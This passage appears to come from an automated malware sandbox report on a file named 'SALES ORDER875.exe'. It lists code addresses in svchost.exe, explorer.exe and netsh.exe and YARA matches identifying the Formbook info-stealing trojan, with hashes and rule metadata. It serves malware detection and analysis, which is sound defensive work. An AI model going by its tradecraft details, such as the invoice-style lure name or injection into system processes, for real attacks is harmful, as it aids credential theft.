Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325B2C0	1_2_0325B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0327516C	1_2_0327516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322F172	1_2_0322F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0330B16B	1_2_0330B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324B1B0	1_2_0324B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F70E9	1_2_032F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FF0E0	1_2_032FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EF0CC	1_2_032EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032470C0	1_2_032470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FF7B0	1_2_032FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03285630	1_2_03285630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F16CC	1_2_032F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F7571	1_2_032F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DD5B0	1_2_032DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033095C3	1_2_033095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FF43F	1_2_032FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03231460	1_2_03231460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FFB76	1_2_032FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325FB80	1_2_0325FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B5BF0	1_2_032B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0327DBF9	1_2_0327DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B3A6C	1_2_032B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FFA49	1_2_032FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F7A46	1_2_032F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DDAAC	1_2_032DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03285AA0	1_2_03285AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E1AA3	1_2_032E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EDAC6	1_2_032EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D5910	1_2_032D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03249950	1_2_03249950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325B950	1_2_0325B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AD800	1_2_032AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032438E0	1_2_032438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FFF09	1_2_032FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FFFB1	1_2_032FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03241F92	1_2_03241F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03203FD2	1_2_03203FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03203FD5	1_2_03203FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03249EB0	1_2_03249EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F7D73	1_2_032F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03243D40	1_2_03243D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F1D5A	1_2_032F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325FDC0	1_2_0325FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B9C32	1_2_032B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FFCF2	1_2_032FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CC3F2	1_2_006CC3F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CE79D	1_2_006CE79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006B2D90	1_2_006B2D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006B2FB0	1_2_006B2FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006B1030	1_2_006B1030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006CD89D	1_2_006CD89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006B9E4C	1_2_006B9E4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_006B9E50	1_2_006B9E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A036	1_2_0316A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316B232	1_2_0316B232
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03161082	1_2_03161082
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E5CD	1_2_0316E5CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03165B32	1_2_03165B32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03165B30	1_2_03165B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168912	1_2_03168912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03162D02	1_2_03162D02
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4CA232	3_2_0E4CA232
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4C4B30	3_2_0E4C4B30
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4C4B32	3_2_0E4C4B32
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4C9036	3_2_0E4C9036
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4C0082	3_2_0E4C0082
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4C1D02	3_2_0E4C1D02
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4C7912	3_2_0E4C7912
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4CD5CD	3_2_0E4CD5CD
Source: C:\Windows\explorer.exe	Code function: 3_2_0E660232	3_2_0E660232
Source: C:\Windows\explorer.exe	Code function: 3_2_0E65F036	3_2_0E65F036
Source: C:\Windows\explorer.exe	Code function: 3_2_0E656082	3_2_0E656082
Source: C:\Windows\explorer.exe	Code function: 3_2_0E65AB30	3_2_0E65AB30
Source: C:\Windows\explorer.exe	Code function: 3_2_0E65AB32	3_2_0E65AB32
Source: C:\Windows\explorer.exe	Code function: 3_2_0E657D02	3_2_0E657D02
Source: C:\Windows\explorer.exe	Code function: 3_2_0E65D912	3_2_0E65D912
Source: C:\Windows\explorer.exe	Code function: 3_2_0E6635CD	3_2_0E6635CD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EA2000	4_2_00EA2000
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EC81CC	4_2_00EC81CC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ED01AA	4_2_00ED01AA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EC41A2	4_2_00EC41A2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E98158	4_2_00E98158
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E00100	4_2_00E00100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EAA118	4_2_00EAA118
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E902C0	4_2_00E902C0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EB0274	4_2_00EB0274
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ED03E6	4_2_00ED03E6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E1E3F0	4_2_00E1E3F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECA352	4_2_00ECA352
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EBE4F6	4_2_00EBE4F6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EC2446	4_2_00EC2446
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EB4420	4_2_00EB4420
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ED0591	4_2_00ED0591
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E10535	4_2_00E10535
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E2C6E0	4_2_00E2C6E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E0C7C0	4_2_00E0C7C0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E10770	4_2_00E10770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E34750	4_2_00E34750
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E3E8F0	4_2_00E3E8F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00DF68B8	4_2_00DF68B8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E1A840	4_2_00E1A840
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E12840	4_2_00E12840
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E129A0	4_2_00E129A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EDA9A6	4_2_00EDA9A6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E26962	4_2_00E26962
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E0EA80	4_2_00E0EA80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EC6BD7	4_2_00EC6BD7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECAB40	4_2_00ECAB40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E00CF2	4_2_00E00CF2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EB0CB5	4_2_00EB0CB5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E10C00	4_2_00E10C00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E0ADE0	4_2_00E0ADE0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E28DBF	4_2_00E28DBF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E1AD00	4_2_00E1AD00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EACD1F	4_2_00EACD1F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECEEDB	4_2_00ECEEDB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E22E90	4_2_00E22E90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECCE93	4_2_00ECCE93
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E10E59	4_2_00E10E59
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECEE26	4_2_00ECEE26
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E02FC8	4_2_00E02FC8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E8EFA0	4_2_00E8EFA0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E84F40	4_2_00E84F40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E52F28	4_2_00E52F28
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E30F30	4_2_00E30F30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EB2F30	4_2_00EB2F30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EC70E9	4_2_00EC70E9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECF0E0	4_2_00ECF0E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E170C0	4_2_00E170C0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EBF0CC	4_2_00EBF0CC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E1B1B0	4_2_00E1B1B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EDB16B	4_2_00EDB16B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E4516C	4_2_00E4516C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00DFF172	4_2_00DFF172
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EB12ED	4_2_00EB12ED
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E2D2F0	4_2_00E2D2F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E2B2C0	4_2_00E2B2C0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E152A0	4_2_00E152A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E5739A	4_2_00E5739A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00DFD34C	4_2_00DFD34C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EC132D	4_2_00EC132D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E01460	4_2_00E01460
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECF43F	4_2_00ECF43F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EAD5B0	4_2_00EAD5B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EC7571	4_2_00EC7571
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EC16CC	4_2_00EC16CC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECF7B0	4_2_00ECF7B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E138E0	4_2_00E138E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E7D800	4_2_00E7D800
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E19950	4_2_00E19950
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E2B950	4_2_00E2B950
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EA5910	4_2_00EA5910
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EBDAC6	4_2_00EBDAC6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E55AA0	4_2_00E55AA0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EADAAC	4_2_00EADAAC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EB1AA3	4_2_00EB1AA3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E83A6C	4_2_00E83A6C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECFA49	4_2_00ECFA49
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EC7A46	4_2_00EC7A46
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E85BF0	4_2_00E85BF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E4DBF9	4_2_00E4DBF9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E2FB80	4_2_00E2FB80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECFB76	4_2_00ECFB76
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECFCF2	4_2_00ECFCF2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E89C32	4_2_00E89C32
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E2FDC0	4_2_00E2FDC0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EC7D73	4_2_00EC7D73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E13D40	4_2_00E13D40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00EC1D5A	4_2_00EC1D5A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E19EB0	4_2_00E19EB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00DD3FD5	4_2_00DD3FD5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00DD3FD2	4_2_00DD3FD2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECFFB1	4_2_00ECFFB1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00E11F92	4_2_00E11F92
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00ECFF09	4_2_00ECFF09
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_01565EB0	4_2_01565EB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_001D1030	4_2_001D1030
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_001EC3F2	4_2_001EC3F2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_001EE79D	4_2_001EE79D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_001D2D90	4_2_001D2D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_001D9E50	4_2_001D9E50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_001D9E4C	4_2_001D9E4C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_001D2FB0	4_2_001D2FB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00C2A036	4_2_00C2A036
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00C21082	4_2_00C21082
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00C28912	4_2_00C28912
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00C2B232	4_2_00C2B232
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00C25B32	4_2_00C25B32
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00C25B30	4_2_00C25B30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00C2E5CD	4_2_00C2E5CD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4_2_00C22D02	4_2_00C22D02

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: String function: 003A0A30 appears 46 times
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: String function: 0039F9F2 appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03275130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0322B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03287E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032BF290 appears 103 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00E7EA12 appears 86 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00E45130 appears 58 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00E8F290 appears 103 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00DFB970 appears 262 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00E57E54 appears 99 times

Source: SALES ORDER875.exe, 00000000.00000003.1820842673.00000000042E3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SALES ORDER875.exe
Source: SALES ORDER875.exe, 00000000.00000003.1828487375.000000000448D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SALES ORDER875.exe

Source: SALES ORDER875.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
